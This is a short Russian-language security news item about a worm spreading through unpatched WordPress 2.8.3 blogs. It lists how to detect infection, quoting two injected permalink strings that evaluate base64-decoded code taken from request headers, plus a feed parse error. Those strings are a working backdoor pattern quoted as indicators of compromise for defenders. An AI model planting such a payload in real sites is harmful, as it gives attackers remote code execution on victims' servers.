Массовое заражение блогов на WordPress
Месяц назад стало известно о новой критической уязвимости в WordPress 2.8.3, позволяющей легко изменить администраторский пароль в удалённом режиме. После этого вышел WordPress 2.8.4, устраняющий эту уязвимость. Однако, как оказалось, далеко не все блогеры следят за обновлениями.
В эти выходные разразилась настоящая эпидемия нового вируса, поражающего блоги на движке WordPress 2.8.3 и более ранних версий в ветке 2.8.
Присутствие вредителя довольно сложно обнаружить сразу, тем более если он ещё ничего не опубликовал. Для этого нужно проверить фид permalinks/rss на присутствие следующего кода.
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
или
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
или ошибки
‘error on line 22 at column 71: xmlParseEntityRef: no name wordpress’
Если есть такой код или фид сломан, то блог инфицирован.
Процедура удаления червя представляет собой нетривиальную задачу .
www.securitylab.ru